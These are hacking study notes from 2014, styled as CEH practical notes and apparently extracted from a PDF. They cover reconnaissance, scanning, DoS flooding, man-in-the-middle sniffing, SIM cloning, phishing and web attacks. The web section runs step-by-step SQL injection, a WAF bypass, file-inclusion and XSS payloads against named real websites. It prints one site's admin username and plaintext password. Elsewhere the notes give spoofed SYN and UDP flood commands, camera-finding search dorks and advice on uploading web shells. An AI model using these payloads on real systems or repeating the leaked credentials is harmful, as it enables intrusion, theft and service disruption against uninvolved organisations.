hacking in shadows by - raghav bisht
TRANSCRIPT
1 | P a g e
R o o t - X S e c u r i t y
H a x a - 1 N u l l L a m b d a : X
0 1 1 0 1 0 0 1 0 0 1
0 0 0 1 1 1 0 0 0 1 1
1 2 / 3 1 / 2 0 1 4
Root-X , Shadow Walker &
Raghav
Hacking In Shadow CEH Practical Notes
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
CONTENT
Foot-printing
Scanning/Banner Grabbing
Enumeration
Google Hacking
Information Gathering [Automated Process ]
Dos Attack D-Dos Attacks
IDS - IPS - Firewall - Antivirus - Honey-pots
Mobile Hacking
Sniffing
Social Engineering
Web-servers & Web-application Hacking
System Hacking
Malwares
Penetration testing
Buffer Overflow
Wi-Fi Hacking
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
FOOTPRINTING 1. Who-is Database domaintools.com
yougetsignal.com
Sam spade [ who is tool ]
net-Tools 5 [ Networking Tools ]
robtex.com
2. Imp Sites archive.org
3. Mirroring Websites httrack
IDM -->Grabber
4. Reverse IP lookup yougetsignal.com
robtex.com
5. ping , netstat, nslookup, tracert CMD Commands ping
ping google.com
ping -t google.com
ping -l 1024 google.com
ping -n 10 google.com
netstat
netstat
netstat -a
netstat -n -o -a
nslookup
nslookup www.site.com
tracert
tracert www.site.com
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
6. Email Harvesting
Tools samspade
black widow
GSA Email Spider
Email Extractor
Metasploit [ Backtrack , Kali Linux ]
msfconsole
search gather [ Search The all Information Gathering Exploits ]
use auxiliary/gather/search_email_collector
set DOMAIN <domain name>
exploit
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Scanning & Banner Grabbing 1. Network Scanning IP scanning
port scanning
Eg. first IP scanning so for IP scanning we use: Check it out :http://120.59.128.29
I. Angry IP Scanner : 0.0.0.0-255.255.255.255 using the concept of = ping sweep , so lets start
Our Target : 120.59.128.1 - 120.59.128.255
On Ports : 80,21,443,110
lets try to open this ip on port 80 - > Its shows me ADSL Modem -> To bypass this
modem we try brute force or dictionary attack.
Eg. Top ten passwords :
admin
user
custom
manager
abc123
abc@123
password
pa55w0rd
Pa55w0Rd
admin@123
123456
passwd
admin123
user123
II. Nmap/Zenmap
III. Port Scanner
IV. Network scan ( NET DISCOVER [ BT-tool ] ) :
netdiscover -i <interface> -r <target>/24 /16 <--- subnet
netdiscover -i etth0 -r 192.168.1.0/24
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
2. vulnerability scanning
I ]Vulnerability Scanner (Acunetix, Netsparke, Nessus, Gfi languard etc) Backtrack Tools
Whatweb [ Find out web application ][ Backtrack Tool ]
Eg: ./whatweb bytec0de.com
zoomscan [ scan Joomla website ] [ /pentest/web/zoomscan ]
Eg: ./zoomscan.pl -u http://liclanka.com/
Nikto :
Eg ./nikto.pl -host liclanka.com
Websecurifi
application/backtrack/exploitation tool/web exploitation tool/websecurifi
Vega
application/backtrack/vulnerability assessment/web application/web vulnerability
scanner/vega
w3af
application/backtrack/vulnerability assessment/web application/web vulnerability
scanner/w3af
webshag
pentest/enumeration/web/webshag [ ./webshag_gui.py ]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
3. Nmap
Types Of Scans :
TYPES || Commands
1. tcp full connect scan ----> nmap -sT <target name>
2. syn half connect scan ----> nmap -sS <target name>
3. Stealth Scan ----> Used for bypassing firewalls
xmas scan ----> nmap -sX <target name>
null scan ----> nmap -sN <target name>
Fin scan ----> nmap -sF <target name>
4. list scan ----> nmap -sL <list.txt>
5. udp scan ----> nmap -sU <target name>
6. ping scan ----> nmap -sP or -nP or -sn <target name>
7. ack scan ----> nmap -sA <target name>
8. window scan ----> nmap -sW <target name>
10. version scan ----> nmap -sV or -v <target name>11. timming -
11 . Timings T1,T2,T3 -----> Deep Scanning
T4,T5 -------> aggressive timing scanning.
12. quick scan -----> nmap -F <target name>
13. Intense Scan -----> nmap -T4 -A -v <target name>
14. Intense Scan + UDP ----> nmap -sS -sU -T4 -A -v <target name>
15. Intense Scan All TCP ----> nmap -p 1-65535 -T4 -A -v <target name>
16. Intense Scan no ping ----> nmap -T4 -A -v -Pn <target name>
17. Quick Scan Plus ----> nmap -sV -T4 -O -F --version-light <target
name>
18. Quick Traceroute ----> nmap -sn --traceroute < target name >
19. Slow Comprehensive scan ----> nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -
PA3389 -PU40125 -PY -g 53 --script
"default or (discovery and safe)" <target>
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Enumeration I. Enumerate users [ To Take Out Details About User Like ( NetBIOS Name,
Users name etc) ] DNS Enumeration
robtex.com
1. dnsenum (BT)
cd /pentest/enumeration/dns/dnsenum
./dnsenum.pl <target>
./dnsenum bytecode.in
2. dnsmap (BT)
cd /pentest/enumeration/dns/dnsmap
./dnsmap bytecode.in
3. dnsrecon (BT)
cd /pentest/enumeration/dns/dnsrecon
./dnsrecon.py -d bytecode.in
4. dnswalk (BT)
cd /pentest/enumeration/dns/dnswalk
./dnswalk bytecode.in. <--- put dot at last
5. dnstracer (BT)
dnstracer -v bytecode.com
6. dig (BT)
dig
dig A <target> -> for A record IPV4
dig AAA <target> -> for A record IPV6
dig MX <target> -> for MX mail exchange record
dig NS <target>
dig SOA <target>
dig SRV <target>
7. fierce.pl (BT)
fierce.pl -dns bytecode.in
8. nslookup (BT)
BT ~ # nslookup
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
www.checkpoint.com
set type=mx [ MX Records ]
checkpoint.com
set type=ns [ NS Records ]
checkpoint.com
9. Automating lookups
Forward lookup brute force
Reverse lookup brute force
Zone transfers
Web Crawling -> [ admin page finding ]
IDM
HTTRACK
Any Vulnerability Software
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Nmap
Shared folders [ my lan viewer ]
NetBIOS Service
1. Scanning for the NetBIOS Service SMB4K (BT) [GUI]
smbserverscan (BT) [GUI]
2. Enumerating Usernames samrdump (BT)
BT smb-enum # ./samrdump.py 192.168.90.18
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Google Hacking 1. http://www.googleguide.com/advanced_operators_reference.html
2. Basic Search
3. Advance Search
4. Directory Listing
intitle:index of parent directory
5. Locating CGI-BIN [ Common Gateway Interface ]
inurl /cgi-bin/login.cgi
6. Traffic Camera Hacking
inurl:indexFrame Camera
allinurl:"view/index" filetype:shtml
== Axis ==
inurl:"view/indexFrame.shtml"
inurl:"view/index.shtml"
intitle:"Live View / - AXIS"
intitle:axis camera
intitle:"axis #Kameramodell#"
== Canon ==
inurl:sample/LvAppl/
== JVC ==
intitle:"V.Networks [Motion Picture(Java)"
== EvoCam ==
intitle:"EvoCam" inurl:"webcam.html"
== WebcamXP ==
intitle:"my webcamXP server!"
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
== MOBOTIX ==
inurl:/control/userimage.html
== Panasonic ==
inurl:/ViewerFrame?Mode=Motion
== FlexWatch ==
inurl:toolam.html
inurl:viewash.html
== Toshiba ==
intitle:"TOSHIBA Network Camera - User Login"
== Sony ==
inurl:/home/homeJ.html
inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
intitle:”Live View / - AXIS 206W”
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Information Gathering [Automated Process ] 1] Information Gathering : > Uberharvest
> theharvester.py
> metaGooFii
> Web Data Extractors ( Email-Phone no Extractors )
> Maltego
2] People Search : > pipl.com
> anywho.com
> address.com
> Social networking sites [ facebook,linedin,twitter ]
> Job Sites [ dice.com, monster.com,naukri.com ]
3] Phone Number > truecaller.com
> kgdetective.com
> phunwa.com
4] Trace route Tools > Trout [ www.foundstone.com ]
> tracert , traceroute [ commands ]
5] Email IP Tracking > http://blasze.tk
> wspy.org
> Emailtrackerpro.com
> Readnotify.com
> Politemail.com
> www.whatismyip.com
> http://www.iptrackeronline.com
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Dos Attack D-Dos Attacks
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
1. DOS ATTACK It is an attempt to make a machine or network resource unavailable to its intended
users.
Consuming all resources given to person. Like Network bandwidth , All Type Of
Memory etc...
Ping Of Death
ping -t -l 6550 google.com [ max buffer size = 65500 ]
ping bytecode.in -l 1460 -n 10000000 -w 1
Effective system [ Solaris 2.4 , ninix , win3.11,95 ]
SYN-ATTACK
hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh
port, syn flood on router, -a <Source address>, -S<Victim addtress>]
UDP/HTTP/TCP Flooding
LOIC
HOIC
Smurf Attack
make your own packet and flood on network
pktbuilder
packETH 1.6 [ linux & windows ]
CDP Flooding [ Cisco Discovery Protocol ]
yersinia [ backtrack ]
Done on Cisco Switches & Routers
MAC Flooding [ BT ]
Flooding network switches
ARP Spoofing
Net cut [ Windows ]
ettercap [ Backtrack ]
Deauthentication Technique
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30
ath0
Where:
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
-0 : means Deauthentication
1 : is the number of deauths to send (you can send multiple if
you wish); 0 means send them continuously
-a : MAC address of the access point ( Router )
-c : MAC address of the client to Deauthentication; if this is
omitted then all clients are deauthenticated
ath0 : is the interface name
2. D-Dos ATTACK HTTP ATTACK
Get-Post Methods
DNS Amplification Attack
NTP Amplification Attack
Slowloris Attack [ Used when , Firewall blocks your Ip address after some
requests ] [slowloris.pl ] slowloris.pl -dns www.site.com -timeout 1 -cache
3. IPV6 Flooding : [ RA Flood Attack]
Victim : windows user
Advertising the IPV6 Network [ ./fake_router6 eth1 def:c0::/64 ]
cd /pentest/spoofing/thc-ipv6
Now flooding. [ ./flood_router6 eth1 ]
4. Scapy [ Packet manipulation tool ] Features -> capture, create, play,
reply, scan, discover.]
I. scapy -> Sending packet from scapy send(IP(src="192.168.1.55",dst="192.168.1.1")/ICMP()/"OurPayload") -> check with
wireshark.
ctrd+d
II. scapy -> Creating Our Packet & Sending Packet L2=Ether()
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
L3=IP()
L4=TCP()
L2.show()
L2=Ether(src="01:23:45:67:89:ab")
L3=IP(ttl=99, dst="192.168.1.1")
del(L3.dst)
L3.dst="192.168.1.2"
L4=TCP(sport=6783, dport=22, flag="A")
L4.show()
send=sendp(L2/L3/L4) -> To send Packet
III. scapy -> Sniffing with scapy sniff(iface="eth0", prn=lambda x:x.show()) -> show full packet detail
ctrl+c
sniff(iface="eth0", prn=lambda x:x.summary()) -> do not show full packet detail
sniff(filter="host 192.168.1.1", count=5)
a=_
a.nsummary()
a[1]
5. Hping3 [ port scanning, syn, ack, ip, others host discovery, sniffer,
flooding, file transfer ] hping3-h "or" man hping3 [Help menu]
hping3 -S www.lpu.in -p 80 -c 2 [ -S -> SYN Request, -c -> how many time to ping ]
hping3 -S 192.168.1.38 -p ++50 -c 5 [++50 port start with 50,51,52,53]
hping3 -1 192.168.1.x --rand-dest -I eth0 [-1-> ICMP , Ping all possible ip address in
random order ]
hping3 -1 192.168.1.1 --icmp-ts -c 2 [Check time stamp ]
hping3 -8 50-56 -S 8.8.8.8 [-8 -> Scaning, 50-56 -> Port, 8.8.8.8 -> google dns server]
hping -2 192.168.1.6 -p 80 -c 1 [-2 -> udp]
hping3 -F -P -U 192.168.1.38 -c 3 [-F -> FIN, -P -> PUSH, -U -> URGENT] [X-Mas
Scan]
hping3 192.168.1.38 -Q -P 139 - s [-Q -> Sequence number]
hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh port, syn
flood on router, -a <Source address>, -S<Victim addtress>]
hping3 –rand-source targetIPadress –flood -S -L 0 -p 80
hping3 -2 www.lpu.in -p ++44444 -T -n [Trace Route using UDP] [ctrl+z -> If doesn't
respond ]
hping3 -S www.lpu.in -p 53 -T [Trace Route using TCP]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
NOTE : hping3 also work as hping interpreter & scapy.
hping3
hping send
"ip(saddr=192.168.1.55,daddr=192.168.1.38,ttl=15)+tcp(sport=6783,dport=80,flags=s)"
6. CDP - Flooding [ Cisco Discovery Protocol ] [CPU Damaging
Routers & Switches] yersinia -G
Launch attack
CDP
flood CDP table
ok
List attacks
cancel all attacks
7. HTTP Flood Attack ApacheBench [Tool BT]
ab -c 1000 -n 10000 http://youripaddress/
8. UDP Flood Attack hping3 -flood-rand-source -udp -p 53 YourtargetIPaddress
*9. SYN FloodAttack hping3 -rand-source targetIPadress -flood -S -L 0 -p 80
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
NOTE : Slowlowris.pl
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
IDS - IPS - Firewall - Antivirus - Honeypots 1. Firewall I. Windows Firewall [ netsh ] netsh /?
netsh lan /?
help
firewall
help
netsh firewall set portopening tcp 445 smb enable --> To open port in my system
TCP/IP troubleshooting and interface resets : Install the TCP/IP protocol- netsh int ipv4 install
Uninstall the TCP/IP protocol- netsh int ipv4 uninstall
Configure the Windows Advanced Firewall :
Show all firewall rules
netsh advfirewall firewall show rule name=all
Delete an inbound advanced firewall rule for port 21
netsh advfirewall firewall delete name rule name=all protocol=tcp
localport=21
Export Windows Advanced Firewall settings - netsh advfirewall export “c:\advfirewall.wfw”
Perhaps the most common command you might use is the command to enable or
disable your Windows firewall, like this: netsh firewall set opmode disable
netsh firewall set opmode enable
1. To deny all incoming connections and allow all outgoing connections :
netsh advfirewall set all profiles firewall policy block inbound, allow
outbound
2. To enable firewall: netsh advfirewall set all profiles state on
netsh firewall set opmode enable
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
3. To disable firewall: netsh advfirewall set all profiles state off
netsh firewall set opmode disable
4. Allow or Deny rules
To add a rule allowing tcp or udp incoming packets on port 80: netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=allow dir=IN
netsh advfirewall firewall add rule name="HTTP"
protocol=UDP localport=80 action=allow dir=IN
To deny tcp or udp packets on port x: netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=block dir=IN
netsh advfirewall firewall add rule name="HTTP"
protocol=UDP localport=80 action=block dir=IN
5. Delete a rule
To delete a rule issue the following command: netsh advfirewall firewall delete rule name="HTTP"
6. Allow or deny
incoming connection for specific port and IP
To allow from specific ip: netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x
To deny from specific ip: netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x
Allow or deny a subnet netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x/24
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
or
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x-x.x.x.x
or
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=block dir=IN remoteip=localsubnet
2. Linux Firewall [ Iptables ]
IP Address Blocking
iptables -A INPUT -s <Ip Address> -j DROP
iptables -A INPUT -s <Ip Address> -p tcp --destination-port 80 -j DROP
iptables -A INPUT -s <Ip Address> -p tcp --destination-port 443 -j DROP
sudo ufw deny from $ip
IP Address Allowing
iptables -D INPUT -s <Ip Address> -j DROP
sudo ufw allow from <Ip Address>
2. Honeypot Net Tools
Hack Trapper
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Honeybot
Port Scan Attack Detector
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Mobile Hacking 1. SIM Cloning
SIM - Subscriber identity module
IMSI - International mobile subscriber identity
IMEI - International Mobile Station Equipment Identity
Esn - Electronic serial number
MIN - Mobile identification number
CDMA Sim Cloning :
1. check for usb drivers
2. attach usb
3. check for port "right click on my computer > manage > device manager > ports"
4. open cdma workshop 2.7.0 set the port > press read.[ All detail of phone will be saved
]
5. give back the victim phone to him.
7. attach reliance netconnect (http://kollam.olx.in/reliance-netconnect-zte-880-cdma-1x-
iid-449181852)
> http://www.priceindia.org/broadband/reliance/zte-mg-880-data-card-price/
8. again see port.
9. open CDMA workshop v2.7.0 --> set port
10. write all sim details on zte-mg-880-data-card
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
2. Android Rooting
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Useful Apps : FX File Explorer Plus v2.3.1.7 ROOT + All Add-Ons
Root Explorer v3.1.7 for Android 2.3 & 3.0+
SD Maid Pro v3.0.2.8 ROOT + Unlocker
SuperSU v1.93 + SuperSU Pro Key
Lucky Patcher v4.3.1.apk
SRSRoot v4.7 Android SRS RootSuperSU v1.93
Root.Explorer.v2.7
SuperSU Pro Key v1.00 ROOT FULL Android
How to root your... HTC One (M8)
Unlock your bootloader via HTCdev.com
Download and install TWRP for the M8 from
http://teamw.in/project/twrp2/225
Flash the SuperSU root zip from http://forum.xda-
developers.com/showthread.php?t=1538053
Samsung Galaxy S5 Download the Odin fl ash utility from http://forum.xda-
developers.com/showthread.php?t=2189539
Download the CF-Auto-Root package from http://forum.xda-
developers.com/showthread.php?t=2696537
Extract the TAR fi le from the CF-Auto-Root zip Select the TAR fi le as
type PDA in Odin, and fl ash with your device in download mode (power
on with home and volume down held)
Sony Xperia Z2 Unlock the bootloader of your device: http://forum.xda-developers.com/
showthread.php?t=2440597
Download ClockworkMod Recovery from http://forum.xda-developers.
com/showthreadphp?t=2702001 and flash using fastboot
Reboot to recovery and fl ash the SuperSU root zip from
http://forum.xda-developers.com/showthreadphp?t=1538053
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
3. Jail breaking IOS APPLE
Jailbreak 7, 7.0.3, 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch
(Guide)
STEP 1: Download Evasi0n7 for Mac OS X/Windows. *new version here*
STEP 2: Download your iOS 7.x.x from our download page.
STEP 3: Make sure to backup all your data on your iPhone using iTunes or iCloud before using
Evasi0n7 untethered jailbreak.
STEP 4: Launch Evasi0n7 and plug in your device to the computer then click on "Jailbreak"
button.
STEP 5: Now Evasi0n7 will start the jailbreak process, so sit back and enjoy.
STEP 6: Evasi0n7 will reboot your device.
STEP 7: After done, an app of Evasi0n7 will appear on your iPhone's homescreen. Tap on it.
STEP 8: Your device will be rebooted again.
STEP 9: Evasi0n7 will continue processing your jailbreak and will reboot your iPhone for
several times until the jailbreak is done.
STEP 8: And you are ready to go.
SOURCE : http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html
Supported Devices : For both Mac OS X and Windows, you can now jailbreak your iOS 7.x device with one-click
Evasi0n7 jailbreak tool.
Jailbreak devices:
iPhone 5s
iPhone 5c
iPhone 5
iPhone 4S
iPhone 4
iPad 2
iPad 3
iPad 4
iPad Air
iPad mini
iPad mini 2
iPod touch 5
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
4. Smartphone Pentest Framework Master Link : https://github.com/georgiaw/Smartphone-Pentest-Framework
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Sniffing 1. Man In The Middle Attack Using Ettercap. Tools : 1] whireshark
2] ettercap
3] cain & able
1] Ettercap:
> vi /etc/etter.conf
> Put : eu_uid = 0
> Put : eu_gid = 0
> Come to linux and enable the iptables rule . ( Remove # )
> ettercap -G [ To open ettercap in graphical mode ]
> sniff / unified sniff / choose interface
> Hosts / scann for host / Host list
> add router ip to target 1 & rest r victims to target 2
> MITM / arp pois
> Start Sniff
2] Wireshark:
> open wireshark
> start sniff
> Filters protocols [ http,ftp,smtp etc ] => http://wiki.wireshark.org/DisplayFilters
> http.request.method == "POST"
> tcp.port eq 25 or icmp
> ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
> tcp.window_size == 0 && tcp.flags.reset != 1
> smb || nbns || dcerpc || nbss || dns
> ip.addr == 10.43.54.65
> ip.addr != 10.43.54.65
NOTE : Analyzing Traffic Using Wireshark
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Step1 : Open Wireshark
Step2 : Choose Interface and Start Sniffing
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Step3 : Filtering Protocols
Step4 : Follow the tcp stream
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Step5: Check the Header
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
3. Man In The Middle Attack Using xplico :
Tools Need 1. Ettercap
2. Xplico
Victim Info :
Victim -> 192.168.1.21
arp -a -> aa-aa-aa-aa-aa-aa
gateway > 192.168.1.1
apt-get update
apt-get upgrade
1. ettercap -G
> sniff
> unified sniffing
> select interface
> host
> scan for host
> Host list
> default gateway add to target 1
> .21 <victim> add to target 2
> Mitm
> arp poisoning
> ok
2. In terminal -> IP Forwarding # echo 1 > /proc/sys/net/ipv4/ip_forward
3. Backtrack > Forensics > Network Forensics > xplico web gui
> http://localhost:9876/
> u : xplico P: xplico
> case
> Live acquistion
> case name : Anything > Create
> Click on your case Eg. anything
> New Session
> Session Name : xyz
> click on session xyz
> At Live :
> Interface
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
> lo, et0, wlan0 ...Etc
NOTE : If victim is doing net all its session will be saved by xplico.
4. driftnet –I eth0
5. Session Hijacking Tokens = 128-256 bit AES cipher
1. Cookies > wireshark filter : http.cookie contains "datr"
> http.cookie && ip.src==<Target ip> -----> Check For : 1012 GET / HTTP/1.1
2. <SCRIPT>alert(document.cookie);</SCRIPT> [XSS - Vulnerability]
3. Fiddler
Step 1 : Open Fiddler
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Step 2 : Tick the https Decryption Check Box
Step 3 : Take Your Victim Traffic
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Step 4 : Take Out Your Victim Cookies
Step 5 : Attacker replace them with help Cookies Editor on firefox.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Social Engineering 1. Human Based
2. Computer Based
1. Human Based : > There is no patch to human stupidity.
> Social Eng is the human side of breaking into a corporate network.
1. Posing as legitimate end user. > Give identity and asks for the sensitive information.
2. Posing as Important user. > as VIP, CFO, CEO etc
3. Posing as Technical Support. > calls as technical support staff and request id & password
4. Eavesdropping > or unauthorized listening of conversation or reading of
messages.
5. Sholder Surfing > Looking over your sholder as you enter a password
6. Dumpster Diving
> Search for sensitive information at target company's. > Trash-bins
> printer trash bins
> sticky notes
> phone bills
> contact information
> financial information
7. Tailgating > An unauthorized person, wearing a fake ID badge enter
secured area by closely following an authorized person through a door
requiring key access.
8. Piggybacking > I forgot my ID badge at home. Please help me.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
2. Computer Based Social Engineering : > Mail / attachments > Trojens
> Keyloggers
> Pop-up Windows
> Phishing > Hoaxes and chain letters
> Websites / Sweepstakes
> Spam mails
Eg. Phishing
Step1 : Creating Fake Facebook page.
Step2 : Save This page Source Code In Notepad
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Step 3 : Find " login.php?login_attempt=1 "
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
2. Tabnapping
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Web-servers & Web-application
Hacking 1] SQL Injection
2] Exploiting Hidden Elements [Tool : web developer addon] > To manuplating html elements, tags,Forms etc on website.
> Eg: woodlandworldwide.com [vanulable site]
3] PHP Discloser > look for vanurable site like
[http://hrithikrules.com/displayArt.php?fname=filmography/krrish2/permission.txt&dirname=ma
in]
> now [ http://hrithikrules.com/displayArt.php?fname=index.php]
4] XSS [Cross Site Scripting] [put JS query to search box, URLS etc] > http://www.hrithikrules.com/ [Put the JS to his search box it will redirectu]
> <script>alert("hacked")</script>
--------> Beef [Tool] [Backtrack] [start server and attach your link to your xss iframe scrpt and
sentd it to other user in lan]
--------> Download beef -> upload it to free hosting site -> get your link ->attach to xxs ---> send
any where in world.
> <script iframe src=http://www.world4free.in></script>
4.1] XSS Shell
5] Lfi / Rfi [File inclusion] [Tool : wAppex] >http://www.hrithikrules.com/displayArt.php?fname=filmography/mohenjodaro/research
.txt&dirname=main
>http://www.hrithikrules.com/displayArt.php?fname=../../../../../../../../../../../../../../etc/pass
wd
6] DNN Portal Hacking
7] Shell Uploading > Do sql injection first find admin password for server.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
> now open his website find any page whick upload some things [ multimedia uploading
]
> upload your shell [ .php,.aspx,.asp,.jsp ]
NOTE : some time directly shell are not uploade so rename there extention to any other filetype
and run " Tamper Data Firefox addon "
while uploading shell. remove your extantion while uploading.
> eg : http://www.arenamultimedia.in/news.aspx?id=news
===========================================================
1. Sql Injection : www.mags.edu.in/aboutus.php?id=2
www.mags.edu.in/aboutus.php?id=2' |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 1 |<--No Error
www.mags.edu.in/aboutus.php?id=2 order by 100 |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 10 |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 2 |<--Error + page content
SO, Directly find the vulnerable column...
www.mags.edu.in/aboutus.php?id=2 union select 1 |<--Show Nothing
www.mags.edu.in/aboutus.php?id=-2 union select 1 |<--Vulnerable column is = 1
www.mags.edu.in/aboutus.php?id=-2 union select 1,2 |<--Error
Now,
1. Find Version Of Database. > www.mags.edu.in/aboutus.php?id=-2 union select @@version | 5.0.96-log
2. Find Database Name > www.mags.edu.in/aboutus.php?id=-2 union select database() | magschool
3. To Find Numbers Of Tables In Database
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=database()
amaps_admin, -----> 0x616d6170735f61646d696e campusphotos, categories, celebration, contentmanagement, courses, domains, engineering,
events
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
,facilities,faculty,medmain,news,pending,query_log,register_form,site_category,sit
es,temp
4. To Find Number of Columns In Table
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(column_name) from
information_schema.columns where table_name=0x616d6170735f61646d696e
adminid ,username ,password
5. To Find Username & Password :
www.mags.edu.in/aboutus.php?id=-2 union select
group_concat(adminid,0x3a,username,0x3a,password) from amaps_admin
adminid = 1
username = adminmags
password = magsmet#749$
______________________________________________________________________________
2. SQL Injection WAF Bypass
http://www.geca.ac.in/departments/hod.php?id=14
http://www.geca.ac.in/departments/hod.php?id=14'
http://www.geca.ac.in/departments/hod.php?id=14 order by 1
http://www.geca.ac.in/departments/hod.php?id=14 order by 2
http://www.geca.ac.in/departments/hod.php?id=14 order by 3
http://www.geca.ac.in/departments/hod.php?id=14 order by 4
http://www.geca.ac.in/departments/hod.php?id=14 order by 5
http://www.geca.ac.in/departments/hod.php?id=14 order by 6
http://www.geca.ac.in/departments/hod.php?id=14 order by 7
http://www.geca.ac.in/departments/hod.php?id=14 order by 8
http://www.geca.ac.in/departments/hod.php?id=14 order by 9
-----------------------------------------------------------
www.geca.ac.in/departments/hod.php?id=14 union select 1,2,3,4,5,6,7,8,9
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Not Acceptable! | An appropriate representation of the requested resource could not be found on
this server. This error was generated by Mod_Security.
So,
www.geca.ac.in/departments/hod.php?id=14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
Vulnerable Columns = 6,3,5
=====================================================================
